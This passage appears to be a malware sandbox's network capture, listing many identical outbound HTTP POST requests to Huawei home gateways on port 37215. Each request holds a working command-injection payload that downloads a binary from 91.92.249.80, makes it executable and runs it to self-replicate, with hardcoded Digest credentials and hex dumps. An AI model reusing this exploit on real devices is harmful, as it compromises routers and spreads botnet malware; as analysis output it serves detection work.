                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1822192.168.2.234120841.141.79.8237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547734022 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1823192.168.2.2338754197.69.216.7237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547743082 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1824192.168.2.2355112157.203.143.18037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547755003 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1825192.168.2.235236875.23.51.9537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547770977 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1826192.168.2.2333496197.65.206.19537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547771931 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1827192.168.2.2354182175.233.216.5237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547840118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1828192.168.2.234239441.236.237.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547840118 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1829192.168.2.2345716128.58.107.21937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547859907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1830192.168.2.2349012166.37.184.16537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.547859907 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1831192.168.2.2337806112.164.193.15637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.548608065 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1832192.168.2.2341290157.119.253.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.549134016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
